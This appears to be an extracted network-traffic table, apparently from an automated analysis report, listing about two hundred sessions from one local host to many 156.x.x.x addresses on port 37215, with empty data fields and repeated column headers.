                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7099192.168.2.1545470156.19.117.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7100192.168.2.1545826156.132.139.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7101192.168.2.1543158156.166.133.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7102192.168.2.1536398156.83.185.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7103192.168.2.1551780156.223.65.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7104192.168.2.1554446156.190.56.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7105192.168.2.1546162156.66.146.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7106192.168.2.1537528156.118.132.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7107192.168.2.1540898156.39.0.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7108192.168.2.1533090156.118.243.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7109192.168.2.1546274156.215.131.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7110192.168.2.1537924156.20.163.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7111192.168.2.1541678156.213.234.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7112192.168.2.1547756156.218.86.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7113192.168.2.1552710156.9.236.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7114192.168.2.1549120156.97.231.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7115192.168.2.1543402156.156.220.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7116192.168.2.1546290156.195.254.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7117192.168.2.1549126156.158.104.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7118192.168.2.1552604156.120.206.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7119192.168.2.1560140156.223.84.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7120192.168.2.1557922156.170.156.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7121192.168.2.1554988156.145.98.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7122192.168.2.1536958156.34.46.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7123192.168.2.1547946156.208.219.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7124192.168.2.1550004156.78.201.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7125192.168.2.1552168156.28.137.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7126192.168.2.1544304156.54.220.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7127192.168.2.1558634156.181.126.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7128192.168.2.1538618156.41.69.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7129192.168.2.1545842156.130.218.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7130192.168.2.1544920156.150.75.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7131192.168.2.1539702156.115.165.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7132192.168.2.1537176156.255.148.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7133192.168.2.1549366156.246.222.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7134192.168.2.1559522156.147.150.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7135192.168.2.1539768156.59.15.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7136192.168.2.1549132156.17.11.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7137192.168.2.1549688156.124.255.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7138192.168.2.1557028156.22.47.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7139192.168.2.1554526156.173.198.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7140192.168.2.1546078156.113.175.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7141192.168.2.1543880156.59.200.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7142192.168.2.1542074156.97.177.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7143192.168.2.1550716156.33.38.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7144192.168.2.1537606156.225.117.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7145192.168.2.1553252156.95.161.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7146192.168.2.1555414156.242.8.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7147192.168.2.1553330156.36.127.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7148192.168.2.1557806156.56.223.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7149192.168.2.1555502156.179.83.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7150192.168.2.1542448156.27.175.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7151192.168.2.1556088156.126.0.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7152192.168.2.1535650156.85.33.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7153192.168.2.1535230156.239.79.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7154192.168.2.1543494156.56.46.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7155192.168.2.1534094156.211.69.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7156192.168.2.1550816156.124.185.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7157192.168.2.1533552156.252.147.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7158192.168.2.1556218156.74.141.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7159192.168.2.1539914156.141.138.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7160192.168.2.1548546156.131.97.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7161192.168.2.1546272156.55.11.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7162192.168.2.1554628156.140.238.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7163192.168.2.1555052156.214.206.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7164192.168.2.1555624156.134.133.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7165192.168.2.1536996156.134.172.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7166192.168.2.1539418156.64.181.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7167192.168.2.1541028156.101.198.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7168192.168.2.1547020156.109.88.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7169192.168.2.1542822156.111.246.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7170192.168.2.1541478156.103.117.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7171192.168.2.1554950156.249.35.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7172192.168.2.1559702156.248.193.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7173192.168.2.1556196156.164.3.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7174192.168.2.1556942156.84.43.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7175192.168.2.1557184156.219.62.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7176192.168.2.1546002156.47.239.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7177192.168.2.1550280156.163.26.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7178192.168.2.1543130156.126.113.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7179192.168.2.1553594156.46.207.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7180192.168.2.1555806156.27.108.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7181192.168.2.1560590156.159.191.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7182192.168.2.1546026156.18.43.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7183192.168.2.1535470156.37.245.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7184192.168.2.1551226156.134.236.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7185192.168.2.1535604156.46.160.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7186192.168.2.1558800156.72.175.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7187192.168.2.1559840156.127.66.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7188192.168.2.1559030156.24.80.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7189192.168.2.1540482156.5.105.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7190192.168.2.1546158156.85.7.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7191192.168.2.1554896156.131.253.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7192192.168.2.1550552156.251.213.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7193192.168.2.1559764156.47.76.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7194192.168.2.1536764156.80.105.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7195192.168.2.1537816156.4.218.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7196192.168.2.1551812156.153.228.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7197192.168.2.1551798156.14.168.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7198192.168.2.1557824156.206.58.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7199192.168.2.1551538156.123.3.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7200192.168.2.1534632156.195.85.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7201192.168.2.1535600156.11.102.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7202192.168.2.1560082156.42.226.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7203192.168.2.1538250156.227.226.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7204192.168.2.1556046156.101.233.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7205192.168.2.1538092156.28.186.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7206192.168.2.1543582156.113.36.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7207192.168.2.1534668156.74.181.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7208192.168.2.1551562156.72.239.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7209192.168.2.1535612156.198.191.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7210192.168.2.1545580156.123.35.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7211192.168.2.1546034156.162.226.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7212192.168.2.1537864156.131.234.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7213192.168.2.1537376156.197.125.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7214192.168.2.1534778156.79.16.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7215192.168.2.1551266156.17.148.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7216192.168.2.1551792156.235.231.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7217192.168.2.1550556156.15.11.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7218192.168.2.1554314156.231.142.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7219192.168.2.1548498156.14.192.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7220192.168.2.1536026156.92.61.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7221192.168.2.1546868156.105.183.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7222192.168.2.1547174156.42.90.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7223192.168.2.1556976156.55.149.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7224192.168.2.1553392156.129.52.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7225192.168.2.1560628156.159.146.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7226192.168.2.1558104156.181.14.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7227192.168.2.1560660156.144.62.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7228192.168.2.1537338156.151.208.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7229192.168.2.1551524156.115.141.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7230192.168.2.1548478156.37.101.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7231192.168.2.1548720156.7.53.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7232192.168.2.1541272156.85.104.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7233192.168.2.1550786156.59.152.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7234192.168.2.1535854156.9.200.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7235192.168.2.1539942156.161.187.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7236192.168.2.1551764156.66.52.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7237192.168.2.1549992156.164.155.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7238192.168.2.1535800156.95.177.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7239192.168.2.1557964156.196.113.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7240192.168.2.1534158156.16.77.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7241192.168.2.1544836156.51.61.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7242192.168.2.1550770156.191.235.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7243192.168.2.1552212156.75.10.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7244192.168.2.1560774156.80.155.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7245192.168.2.1551160156.171.182.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7246192.168.2.1535274156.90.67.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7247192.168.2.1559198156.27.21.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7248192.168.2.1554148156.55.87.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7249192.168.2.1542514156.110.73.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7250192.168.2.1553986156.8.17.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7251192.168.2.1551882156.51.127.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7252192.168.2.1541508156.188.223.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7253192.168.2.1534616156.38.23.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7254192.168.2.1542376156.166.14.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7255192.168.2.1552994156.181.92.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7256192.168.2.1539982156.65.74.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7257192.168.2.1543546156.139.78.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7258192.168.2.1553654156.193.1.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7259192.168.2.1534280156.97.206.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7260192.168.2.1555964156.101.61.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7261192.168.2.1543632156.79.98.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7262192.168.2.1557430156.188.10.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7263192.168.2.1543134156.227.128.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7264192.168.2.1558588156.82.254.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7265192.168.2.1554454156.106.128.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7266192.168.2.1539864156.37.111.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7267192.168.2.1560382156.234.148.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7268192.168.2.1538774156.16.68.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7269192.168.2.1534452156.216.159.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7270192.168.2.1558696156.197.174.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7271192.168.2.1553142156.123.195.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7272192.168.2.1536540156.6.201.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7273192.168.2.1551980156.70.217.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7274192.168.2.1533552156.214.163.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7275192.168.2.1548578156.180.178.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7276192.168.2.1545140156.50.235.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7277192.168.2.1549834156.201.111.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7278192.168.2.1535246156.82.222.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7279192.168.2.1537528156.143.200.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7280192.168.2.1542834156.42.251.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7281192.168.2.1533628156.64.184.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7282192.168.2.1545526156.33.45.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7283192.168.2.1541224156.134.115.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7284192.168.2.1550194156.20.203.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7285192.168.2.1539086156.147.141.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7286192.168.2.1538944156.82.229.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7287192.168.2.1560172156.29.167.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7288192.168.2.1545260156.65.102.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7289192.168.2.1560970156.177.123.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7290192.168.2.1542954156.139.112.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7291192.168.2.1540426156.45.217.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7292192.168.2.1534086156.124.191.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7293192.168.2.1554926156.194.27.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7294192.168.2.1548154156.74.101.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7295192.168.2.1535334156.225.36.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7296192.168.2.1541982156.232.134.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7297192.168.2.1559454156.19.91.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7298192.168.2.1550904156.244.32.637215
